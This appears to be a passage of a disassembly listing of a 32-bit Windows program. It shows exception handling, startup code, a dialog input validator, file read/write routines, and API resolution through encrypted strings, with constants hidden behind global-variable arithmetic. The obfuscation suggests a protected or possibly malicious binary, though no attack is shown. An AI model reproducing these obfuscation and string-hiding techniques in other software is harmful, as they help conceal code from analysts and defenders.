loc_41A47F: ; CODE XREF: sub_41A433+2A�j
; sub_41A433+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41A433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A48D proc near ; CODE XREF: .data:0041A54E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001098h
push [ebp+arg_0]
call sub_424FB1
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41A48D endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_41A582
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41A4E0: ; CODE XREF: .data:0041A579�j
cmp esi, 0FFFFFFFFh
jz loc_41A591
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41A570
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10012034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10012038h, eax
mov eax, [edx+4]
mov ds:1001203Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10012040h
mov esi, ds:10012038h
rep movsd
lea edi, ds:10012040h
mov ds:10012038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41A570
js short loc_41A57E
mov edi, [ebx+8]
push ebx
call sub_41A48D
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41A433
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41A570: ; CODE XREF: .data:0041A4F1�j
; .data:0041A546�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41A4E0
; ---------------------------------------------------------------------------
loc_41A57E: ; CODE XREF: .data:0041A548�j
xor eax, eax
jmp short loc_41A59B
; ---------------------------------------------------------------------------
loc_41A582: ; CODE XREF: .data:0041A4C5�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41A433
add esp, 0Ch
loc_41A591: ; CODE XREF: .data:0041A4E3�j
push 0Bh
call sub_424FF9
add esp, 4
loc_41A59B: ; CODE XREF: .data:0041A580�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_41A5B4
call sub_41A5D0
loc_41A5B4: ; CODE XREF: .data:0041A5AD�j
call sub_424F3C
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10012000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5D0 proc near ; CODE XREF: .data:0041A5AF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_424FC9
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_424FC9
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_424FC9
mov [ebp+var_C], eax
push 1001201Eh
push [ebp+var_8]
call sub_424FBD
mov ds:10012008h, eax
push 1001201Ch
push [ebp+var_4]
call sub_424FBD
mov ds:10012004h, eax
push 1001201Ch
push [ebp+var_C]
call sub_424FBD
add esp, 30h
mov ds:1001200Ch, eax
mov edi, ds:10012004h
or edi, edi
jz short loc_41A649
push 0
push edi
call sub_425005
add esp, 8
loc_41A649: ; CODE XREF: sub_41A5D0+6C�j
mov edi, ds:1001200Ch
or edi, edi
jz short loc_41A663
push 0
push edi
call sub_425005
add esp, 8
call sub_41A669
loc_41A663: ; CODE XREF: sub_41A5D0+81�j
pop edi
leave
retn
sub_41A5D0 endp
; ---------------------------------------------------------------------------
dw 9090h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A669 proc near ; CODE XREF: sub_41A5D0+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_424FA5
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_41A6A1
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A669+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_41A68D
inc [ebp+var_C]
loc_41A68D: ; CODE XREF: sub_41A669+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_41A6A1: ; CODE XREF: sub_41A669+1A�j
cmp byte ptr [ebx], 0
jnz short loc_41A685
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_424FED
pop ecx
mov [ebp+var_8], eax
mov ds:10012010h, eax
cmp [ebp+var_8], 0
jnz short loc_41A6CF
xor eax, eax
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A6CF: ; CODE XREF: sub_41A669+60�j
mov ebx, [ebp+var_10]
jmp short loc_41A719
; ---------------------------------------------------------------------------
loc_41A6D4: ; CODE XREF: sub_41A669+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_41A713
push [ebp+var_4]
call sub_424FED
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_41A701
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A701: ; CODE XREF: sub_41A669+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_425011
add esp, 8
add [ebp+var_8], 4
loc_41A713: ; CODE XREF: sub_41A669+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_41A719: ; CODE XREF: sub_41A669+69�j
cmp byte ptr [ebx], 0
jnz short loc_41A6D4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_41A72C: ; CODE XREF: sub_41A669+64�j
; sub_41A669+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A669 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10011BA8h
call dword ptr ds:1000EA3Ch
mov eax, ds:10011BA8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41A748 proc near ; CODE XREF: .data:0042321A�p
push 2
call sub_41C232
push 0
call sub_41C232
add esp, 8
retn
sub_41A748 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov eax, ebx
cmp eax, 100h
jz short loc_41A78B
jl loc_41ACD6
cmp eax, 111h
jz loc_41A825
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41A78B: ; CODE XREF: .data:0041A773�j
cmp dword ptr [ebp+10h], 9
jnz loc_41ACD6
mov edi, ds:1001212Ch
sub edi, 5
jmp short loc_41A80B
; ---------------------------------------------------------------------------
loc_41A7A0: ; CODE XREF: .data:0041A81E�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
cmp ds:1000F380h[eax], esi
jnz short loc_41A7D5
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000EA40h
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41A7D5: ; CODE XREF: .data:0041A7B4�j
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
cmp ds:1000F384h[eax], esi
jnz short loc_41A80A
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000EA40h
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41A80A: ; CODE XREF: .data:0041A7E9�j
inc edi
loc_41A80B: ; CODE XREF: .data:0041A79E�j
mov eax, ds:100121ACh
add eax, 5Bh
movsx edx, word ptr ds:100120D8h
add eax, edx
cmp edi, eax
jb short loc_41A7A0
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41A825: ; CODE XREF: .data:0041A780�j
mov edi, ds:100120CCh
dec edi
jmp short loc_41A848
; ---------------------------------------------------------------------------
loc_41A82E: ; CODE XREF: .data:0041A854�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
mov eax, ds:1000F38Ch[eax]
cmp [ebp+14h], eax
jz short loc_41A856
inc edi
loc_41A848: ; CODE XREF: .data:0041A82C�j
movsx eax, word ptr ds:10012100h
add eax, 5Bh
cmp edi, eax
jb short loc_41A82E
loc_41A856: ; CODE XREF: .data:0041A845�j
movsx eax, word ptr ds:10012194h
add eax, 64h
cmp edi, eax
jz loc_41ACD6
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:1000F378h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:100121B8h
mov byte ptr [ebp+eax-207h], 4Bh
mov eax, ds:100121B0h
add eax, ds:100121C0h
mov edx, ds:1001209Ch
add edx, ds:100120ECh
sub edx, 0Dh
mov [ebp+eax-206h], dl
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 8
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:10012198h
movsx edx, word ptr ds:100121A8h
add eax, edx
movsx eax, byte ptr [ebp+eax-10Bh]
movsx edx, word ptr ds:1001216Ch
add edx, ds:100120A4h
sub edx, 6
cmp eax, edx
jnz short loc_41A95A
mov eax, ds:1001217Ch
sub eax, 6
push eax
push 0
push 10013837h
push 0
call dword ptr ds:10011640h
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:1000F380h[eax]
call dword ptr ds:1000EA40h
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41A95A: ; CODE XREF: .data:0041A921�j
push 10013832h
call sub_4228CE
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:10011BA4h
mov eax, ds:100120ACh
add eax, ds:100121CCh
movsx eax, byte ptr [ebp+eax-10Ah]
mov edx, ds:100120E4h
sub edx, 2
cmp eax, edx
jnz short loc_41AA0C
mov eax, ds:1001218Ch
add eax, ds:100121C8h
sub eax, 3
push eax
push 0
push 10013813h
push 0
call dword ptr ds:10011640h
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:1000F384h[eax]
call dword ptr ds:1000EA40h
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41AA0C: ; CODE XREF: .data:0041A9CD�j
push 1001380Eh
call sub_4228CE
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:10011BA4h
movsx eax, word ptr ds:10012194h
add eax, ds:10012188h
movsx eax, byte ptr [ebp+eax-103h]
mov edx, ds:1001209Ch
sub edx, 8
cmp eax, edx
jz loc_41ABB9
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41AA90: ; CODE XREF: .data:0041AA95�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AA90
mov edx, eax
mov ecx, ds:100121B8h
movsx eax, word ptr ds:10012100h
add ecx, eax
sub ecx, 8
cmp edx, ecx
jb loc_41ABB9
mov eax, ds:100120C4h
add eax, ds:100120F0h
sub eax, 8
mov [ebp-105h], al
jmp short loc_41AAEB
; ---------------------------------------------------------------------------
loc_41AAC9: ; CODE XREF: .data:0041AB04�j
movzx eax, byte ptr [ebp-105h]
mov al, [ebp+eax-103h]
cmp al, 30h
jl short loc_41AADF
cmp al, 39h
jle short loc_41AAE4
loc_41AADF: ; CODE XREF: .data:0041AAD9�j
jmp loc_41ABB9
; ---------------------------------------------------------------------------
loc_41AAE4: ; CODE XREF: .data:0041AADD�j
add byte ptr [ebp-105h], 1
loc_41AAEB: ; CODE XREF: .data:0041AAC7�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41AAF4: ; CODE XREF: .data:0041AAF9�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AAF4
movzx ecx, byte ptr [ebp-105h]
cmp ecx, eax
jb short loc_41AAC9
movsx eax, word ptr ds:100120D8h
add eax, ds:100120D4h
sub eax, 6
mov [ebp-104h], al
jmp short loc_41AB95
; ---------------------------------------------------------------------------
loc_41AB1E: ; CODE XREF: .data:0041ABAE�j
mov al, [ebp-104h]
mov [ebp-219h], al
jmp short loc_41AB55
; ---------------------------------------------------------------------------
loc_41AB2C: ; CODE XREF: .data:0041AB6E�j
movzx eax, byte ptr [ebp-219h]
movsx eax, byte ptr [ebp+eax-103h]
movzx edx, byte ptr [ebp-104h]
movsx edx, byte ptr [ebp+edx-103h]
cmp eax, edx
jnz short loc_41AB70
add byte ptr [ebp-219h], 1
loc_41AB55: ; CODE XREF: .data:0041AB2A�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41AB5E: ; CODE XREF: .data:0041AB63�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AB5E
movzx ecx, byte ptr [ebp-219h]
cmp ecx, eax
jb short loc_41AB2C
loc_41AB70: ; CODE XREF: .data:0041AB4C�j
movzx eax, byte ptr [ebp-219h]
movzx edx, byte ptr [ebp-104h]
sub eax, edx
movsx edx, word ptr ds:100120C8h
sub edx, 4
cmp eax, edx
jg short loc_41ABB9
add byte ptr [ebp-104h], 1
loc_41AB95: ; CODE XREF: .data:0041AB1C�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_41AB9E: ; CODE XREF: .data:0041ABA3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AB9E
movzx ecx, byte ptr [ebp-104h]
cmp ecx, eax
jb loc_41AB1E
jmp loc_41AC4F
; ---------------------------------------------------------------------------
loc_41ABB9: ; CODE XREF: .data:0041AA81�j
; .data:0041AAAD�j ...
movsx eax, word ptr ds:100120C8h
add eax, 7C9h
push eax
call dword ptr ds:10011630h
push 100137D5h
call sub_4228CE
mov [ebp-21Ch], eax
push 100137BEh
call sub_4228CE
mov edx, ds:1001218Ch
add edx, ds:10012174h
sub edx, 0Ah
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call dword ptr ds:10011640h
push 100137BAh
call sub_4228CE
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp-220h], eax
mov edx, eax
push dword ptr ds:1000F388h[edx]
call dword ptr ds:10011654h
mov eax, 30h
mul edi
mov [ebp-224h], eax
push dword ptr ds:1000F388h[eax]
call dword ptr ds:1000EA40h
jmp loc_41ACD6
; ---------------------------------------------------------------------------
loc_41AC4F: ; CODE XREF: .data:0041ABB4�j
push 100137B5h
call sub_4228CE
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000C020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C020h
mov eax, 30h
mul edi
mov [ebp-228h], eax
push dword ptr ds:1000F378h[eax]
call dword ptr ds:1000F224h
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000C04Ch
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp-22Ch], eax
push dword ptr ds:1000F374h[eax]
call dword ptr ds:10011658h
mov eax, 30h
mul edi
mov [ebp-230h], eax
and dword ptr ds:1000F370h[eax], 0
loc_41ACD6: ; CODE XREF: .data:0041A775�j
; .data:0041A786�j ...
mov edi, ds:10012124h
dec edi
jmp loc_41ADB6
; ---------------------------------------------------------------------------
loc_41ACE2: ; CODE XREF: .data:0041ADC0�j
mov eax, 30h
mul edi
mov [ebp-8], eax
cmp esi, ds:1000F380h[eax]
jnz short loc_41AD19
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-0Ch], eax
push dword ptr ds:1000F390h[eax]
call dword ptr ds:1001160Ch
jmp loc_41ADC6
; ---------------------------------------------------------------------------
loc_41AD19: ; CODE XREF: .data:0041ACF3�j
mov eax, 30h
mul edi
mov [ebp-10h], eax
cmp esi, ds:1000F384h[eax]
jnz short loc_41AD4D
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-14h], eax
push dword ptr ds:1000F394h[eax]
call dword ptr ds:1001160Ch
jmp short loc_41ADC6
; ---------------------------------------------------------------------------
loc_41AD4D: ; CODE XREF: .data:0041AD2A�j
mov eax, 30h
mul edi
mov [ebp-18h], eax
cmp esi, ds:1000F388h[eax]
jnz short loc_41AD81
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-1Ch], eax
push dword ptr ds:1000F398h[eax]
call dword ptr ds:1001160Ch
jmp short loc_41ADC6
; ---------------------------------------------------------------------------
loc_41AD81: ; CODE XREF: .data:0041AD5E�j
mov eax, 30h
mul edi
mov [ebp-20h], eax
cmp esi, ds:1000F37Ch[eax]
jnz short loc_41ADB5
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-24h], eax
push dword ptr ds:1000F39Ch[eax]
call dword ptr ds:1001160Ch
jmp short loc_41ADC6
; ---------------------------------------------------------------------------
loc_41ADB5: ; CODE XREF: .data:0041AD92�j
inc edi
loc_41ADB6: ; CODE XREF: .data:0041ACDD�j
mov eax, ds:1001213Ch
add eax, 62h
cmp edi, eax
jb loc_41ACE2
loc_41ADC6: ; CODE XREF: .data:0041AD14�j
; .data:0041AD4B�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADCD proc near ; CODE XREF: sub_41BB8D+17D�p
; sub_41F4F7+CC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call dword ptr ds:1000C000h
mov edi, eax
push 0
push 0
movsx eax, word ptr ds:10012154h
add eax, 1FF7h
push eax
push esi
push edi
push ebx
mov eax, ds:100121C0h
sub eax, 3
push eax
push 0
call dword ptr ds:1000C00Ch
mov eax, ds:10012138h
add eax, ds:10012120h
sub eax, 0Ah
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41ADCD endp
; =============== S U B R O U T I N E =======================================
sub_41AE1F proc near ; CODE XREF: .data:00423028�p
push edi
push 100137A8h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121E0h, eax
test eax, eax
jnz short loc_41AE52
push 1001379Bh
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121E0h, eax
loc_41AE52: ; CODE XREF: sub_41AE1F+1A�j
push 1001378Ch
call sub_4228CE
push eax
push dword ptr ds:100121E0h
call dword ptr ds:1000E1F8h
mov ds:1000F250h, eax
push 1001377Ah
call sub_4228CE
add esp, 8
push eax
push dword ptr ds:100121E0h
call dword ptr ds:1000E1F8h
mov ds:1000D120h, eax
pop edi
retn
sub_41AE1F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10011784h
call dword ptr ds:1000EA3Ch
mov eax, ds:10011784h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word ptr ds:10012090h
add eax, ds:100121ACh
sub eax, 5
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41AEDE
push 1000E0F0h
lea eax, [ebp-110h]
push eax
call sub_424F6D
jmp short loc_41AEEF
; ---------------------------------------------------------------------------
loc_41AEDE: ; CODE XREF: .data:0041AEC9�j
push 1000F260h
lea eax, [ebp-110h]
push eax
call sub_424F6D
loc_41AEEF: ; CODE XREF: .data:0041AEDC�j
push 0
mov eax, ds:100121C8h
movsx edx, word ptr ds:10012194h
add eax, edx
sub eax, 2
push eax
push 4
push 0
movsx eax, word ptr ds:100120E0h
add eax, ds:10012124h
dec eax
push eax
push 40000000h
lea eax, [ebp-110h]
push eax
call dword ptr ds:10011788h
mov [ebp-8], eax
push 2
push 0
mov eax, ds:100121C8h
sub eax, 2
push eax
push dword ptr [ebp-8]
call dword ptr ds:10011B9Ch
push 10013772h
call sub_4228CE
pop ecx
push 0
lea edx, [ebp-0Ch]
push edx
movsx edx, word ptr ds:1001216Ch
movsx ecx, word ptr ds:100121BCh
add edx, ecx
sub edx, 6
push edx
push eax
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
push 493E0h
push 40h
call dword ptr ds:1000EA34h
mov ebx, eax
push 61A80h
push 40h
call dword ptr ds:1000EA34h
mov esi, eax
movsx eax, word ptr ds:100120E0h
add eax, ds:100120B4h
sub eax, 8
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41AFB4
mov eax, [ebp+8]
inc eax
push eax
push ebx
call sub_424F6D
jmp short loc_41AFBD
; ---------------------------------------------------------------------------
loc_41AFB4: ; CODE XREF: .data:0041AFA5�j
push dword ptr [ebp+8]
push ebx
call sub_424F6D
loc_41AFBD: ; CODE XREF: .data:0041AFB2�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41AFC2: ; CODE XREF: .data:0041AFC7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AFC2
mov [ebp-4], eax
mov eax, ds:100120CCh
mov edi, eax
add edi, ds:10012184h
sub edi, 7
jmp short loc_41B004
; ---------------------------------------------------------------------------
loc_41AFDE: ; CODE XREF: .data:0041B007�j
movzx eax, byte ptr [ebx+edi]
mov [ebp-114h], eax
mov eax, edi
mul edi
mov [ebp-118h], eax
mov eax, [ebp-114h]
mov edx, [ebp-118h]
add eax, edx
mov [ebx+edi], al
inc edi
loc_41B004: ; CODE XREF: .data:0041AFDC�j
cmp edi, [ebp-4]
jb short loc_41AFDE
mov eax, ds:1001212Ch
add eax, 61A73h
movsx edx, word ptr ds:10012154h
add eax, edx
push eax
push esi
push dword ptr [ebp-4]
push ebx
call sub_41B7B4
add esp, 10h
mov eax, ds:100120C0h
mov edi, eax
add edi, ds:100121ACh
sub edi, 5
jmp short loc_41B051
; ---------------------------------------------------------------------------
loc_41B03C: ; CODE XREF: .data:0041B05F�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_41B046
mov byte ptr [esi+edi], 28h
loc_41B046: ; CODE XREF: .data:0041B040�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_41B050
mov byte ptr [esi+edi], 29h
loc_41B050: ; CODE XREF: .data:0041B04A�j
inc edi
loc_41B051: ; CODE XREF: .data:0041B03A�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41B056: ; CODE XREF: .data:0041B05B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B056
cmp edi, eax
jb short loc_41B03C
mov eax, ds:10012174h
sub eax, 9
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_41B08F
push 0
lea eax, [ebp-0Ch]
push eax
mov eax, ds:100120FCh
sub eax, 6
push eax
push 10013770h
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
loc_41B08F: ; CODE XREF: .data:0041B070�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41B094: ; CODE XREF: .data:0041B099�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B094
push 0
lea edx, [ebp-0Ch]
push edx
movsx edx, word ptr ds:10012168h
sub edx, 7
mov edi, eax
add edi, edx
push edi
push esi
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
push dword ptr [ebp-8]
call dword ptr ds:10010650h
push ebx
call dword ptr ds:1000E618h
push esi
call dword ptr ds:1000E618h
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0D6 proc near ; CODE XREF: .data:00422CA1�p
; sub_423996+165�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41B11E
cmp [ebp+arg_4], 0
jz short loc_41B11A
mov eax, [ebp+arg_4]
mov edx, ds:100120F8h
add edx, ds:1001209Ch
sub edx, 0Ah
mov [eax], edx
loc_41B11A: ; CODE XREF: sub_41B0D6+2E�j
xor eax, eax
jmp short loc_41B162
; ---------------------------------------------------------------------------
loc_41B11E: ; CODE XREF: sub_41B0D6+28�j
push 0
push edi
call dword ptr ds:10011624h
mov esi, eax
add eax, 10h
push eax
push 40h
call dword ptr ds:1000EA34h
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_41B147
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_41B14D
; ---------------------------------------------------------------------------
loc_41B147: ; CODE XREF: sub_41B0D6+67�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_41B14D: ; CODE XREF: sub_41B0D6+6F�j
push [ebp+var_8]
push esi
push ebx
push edi
call dword ptr ds:1000C028h
push edi
call dword ptr ds:10010650h
mov eax, ebx
loc_41B162: ; CODE XREF: sub_41B0D6+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B0D6 endp
; =============== S U B R O U T I N E =======================================
sub_41B167 proc near ; CODE XREF: .data:00423041�p
push edi
push 10013761h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121F4h, eax
test eax, eax
jnz short loc_41B19A
push 10013752h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121F4h, eax
loc_41B19A: ; CODE XREF: sub_41B167+1A�j
push 1001373Eh
call sub_4228CE
pop ecx
push eax
push dword ptr ds:100121F4h
call dword ptr ds:1000E1F8h
mov ds:1000EA44h, eax
pop edi
retn
sub_41B167 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B1B9 proc near ; CODE XREF: sub_41B939+17F�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_41C3F2
push 10013739h
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 10013731h
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
movsx eax, word ptr ds:10012100h
add eax, ds:100120E4h
sub eax, 0Bh
push eax
push 3
push 0
mov eax, ds:10012160h
sub eax, 8
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41B27C
mov eax, ds:10012160h
sub eax, 8
mov edx, [ebp+arg_0]
movsx ecx, word ptr ds:100120B0h
sub ecx, 8
mov [edx+eax], cl
jmp short loc_41B2E0
; ---------------------------------------------------------------------------
loc_41B27C: ; CODE XREF: sub_41B1B9+A7�j
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_170]
push eax
movsx eax, word ptr ds:100120B0h
mov edx, ds:10012124h
lea eax, [eax+edx+0Bh]
push eax
push [ebp+arg_0]
push edi
call dword ptr ds:1000C028h
mov [ebp+var_16C], eax
push edi
call dword ptr ds:10010650h
mov eax, ds:100120C4h
sub eax, 4
cmp [ebp+var_16C], eax
jnz short loc_41B2E0
mov eax, ds:10012130h
mov edx, [ebp+arg_0]
mov ecx, ds:100121C4h
sub ecx, 5
mov [edx+eax], cl
loc_41B2E0: ; CODE XREF: sub_41B1B9+C1�j
; sub_41B1B9+111�j
pop edi
pop esi
leave
retn
sub_41B1B9 endp
